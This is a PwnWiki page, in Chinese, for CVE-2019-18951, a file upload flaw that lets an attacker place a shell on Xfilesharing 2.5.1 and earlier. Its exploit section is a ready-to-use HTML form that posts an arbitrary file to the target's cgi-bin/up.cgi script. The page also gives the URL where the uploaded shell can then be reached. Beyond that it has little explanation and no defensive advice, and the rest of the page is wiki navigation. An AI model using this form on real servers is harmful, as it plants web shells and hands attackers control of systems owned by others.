CVE-2019-18951 Xfilesharing 2.5.1 本地文件上傳shell漏洞

Other languages:

漏洞影響

Version: <=2.5.1

EXP

<form action="http://<target>/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
   <input type="text" name="sid" value="joe">
   <input type="file" name="file">
   <input type="submit" value="Upload" name="submit">
</form>

Shell : http://<target>/cgi-bin/temp/joe/she

Anonymous

Search

CVE-2019-18951 Xfilesharing 2.5.1 本地文件上傳shell漏洞

Namespaces

More

Page actions

漏洞影響

EXP

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

CVE-2019-18951 Xfilesharing 2.5.1 本地文件上傳shell漏洞

漏洞影響

EXP

Navigation

Wiki tools

Page tools